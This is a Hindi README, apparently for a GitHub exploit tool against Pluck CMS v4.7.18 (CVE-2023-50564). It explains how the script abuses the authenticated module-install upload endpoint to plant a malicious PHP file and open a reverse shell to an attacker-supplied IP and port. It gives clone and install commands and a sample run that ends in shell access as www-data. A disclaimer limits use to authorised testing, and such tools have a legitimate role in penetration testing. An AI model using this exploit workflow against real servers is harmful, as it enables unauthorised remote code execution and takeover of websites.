
यह स्क्रिप्ट Pluck CMS v4.7.18 में फ़ाइल अपलोड सुविधा का शोषण करके एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करती है, जिससे रिवर्स शेल के माध्यम से दूरस्थ पहुँच सक्षम होती है। अपलोड होने के बाद, यह बैकडोर हमलावर को वेब सर्वर अनुमतियों के साथ सर्वर पहुँच प्रदान करता है, जिससे सिस्टम या नेटवर्क के भीतर आगे की कार्रवाई संभव होती है।
यह स्क्रिप्ट Pluck CMS v4.7.18 (CVE-2023-50564) में प्रमाणित आर्बिट्रेरी फ़ाइल अपलोड भेद्यता का शोषण करती है। इस भेद्यता का लाभ उठाकर, एक प्रमाणित हमलावर एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड कर सकता है, जिससे आर्बिट्रेरी कोड का निष्पादन संभव हो जाता है (इस मामले में, एक रिवर्स शेल)।
यह भेद्यता /admin.php?action=installmodule एंडपॉइंट में मौजूद है, जो एक प्रमाणित उपयोगकर्ता को आर्बिट्रेरी फ़ाइलों वाली ZIP फ़ाइल अपलोड करने की अनुमति देता है। एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करके, यह एक्सप्लॉइट हमलावर के पास वापस एक रिवर्स शेल स्थापित करता है।
pip install requestspip install requests-toolbeltइस स्क्रिप्ट को Pluck CMS इंस्टेंस के लिए एक मान्य लॉगिन की भी आवश्यकता होती है, जिसमें लक्ष्य का URL और पासवर्ड शामिल है।
su, sudo -l) का पता लगाता है और उपयोगकर्ता को मैन्युअल रूप से इनपुट प्रदान करने की अनुमति देता है।git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
Python का उपयोग करके एक्सप्लॉइट चलाएँ:
python3 exploit.py
Shell> प्रॉम्प्ट प्रस्तुत किया जाएगा।उदाहरण:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
यह स्क्रिप्ट शैक्षिक उद्देश्यों और नैतिक हैकिंग के लिए है। इसका उपयोग केवल उन परिवेशों में किया जाना चाहिए जहाँ आपके पास परीक्षण करने की स्पष्ट अनुमति हो। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए MIT License देखें।
बेझिझक रिपॉजिटरी को फोर्क करें और पुल रिक्वेस्ट सबमिट करें। किसी भी समस्या या फीचर अनुरोध के लिए, कृपया GitHub पर एक issue खोलें।